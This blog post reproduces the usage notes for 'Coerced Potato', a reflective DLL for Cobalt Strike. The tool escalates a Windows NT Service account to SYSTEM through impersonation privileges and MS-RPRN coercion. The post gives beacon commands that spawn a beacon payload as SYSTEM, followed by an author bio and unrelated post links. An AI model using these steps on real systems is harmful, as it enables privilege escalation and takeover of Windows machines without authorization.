Cyber security

Coerced Potato Reflective DLL – Unveiling Privilege Escalation From NT Service To SYSTEM

Privilege escalation from NT Service to SYSTEM using SeImpersonateToken privilege and MS-RPRN functions.

Heavily based

Reflective Loader from

Install

Clone this repo and compile the project in VisualStudio then load dist/coercedpotato.cna into CobaltStrike.

Usage

You first need to spawn the RPC listener with

beacon> CoercedPotato spawn ProcessToSpawn OptionalCmdArgument

for example

beacon> CoercedPotato spawn C:\Windows\Temp\beacon.exe
beacon> CoercedPotato spawn C:\Windows\Temp\loader.exe C:\Windows\Temp\beacon.bin

then you can trigger a SYSTEM call

beacon> CoercedPotato coerce
Varshini

Varshini is a Cyber Security expert in Threat Analysis, Vulnerability Assessment, and Research. Passionate about staying ahead of emerging Threats and Technologies.

Leave a Comment
Share
Published by
Varshini
Tags: Coerced Potato Reflective DLLcybersecurityinformationsecuritykalilinuxkalilinuxtools
2 years ago

Recent Posts

How Web Application Firewalls (WAFs) Work

General Working of a Web Application Firewall (WAF) A Web Application Firewall (WAF) acts as…

5 days ago

How to Send POST Requests Using curl in Linux

How to Send POST Requests Using curl in Linux If you work with APIs, servers,…

5 days ago

What Does chmod 777 Mean in Linux

If you are a Linux user, you have probably seen commands like chmod 777 while…

5 days ago

How to Undo and Redo in Vim or Vi

Vim and Vi are among the most powerful text editors in the Linux world. They…

5 days ago

How to Unzip and Extract Files in Linux

Working with compressed files is a common task for any Linux user. Whether you are…

5 days ago

Free Email Lookup Tools and Reverse Email Search Resources

In the digital era, an email address can reveal much more than just a contact…

5 days ago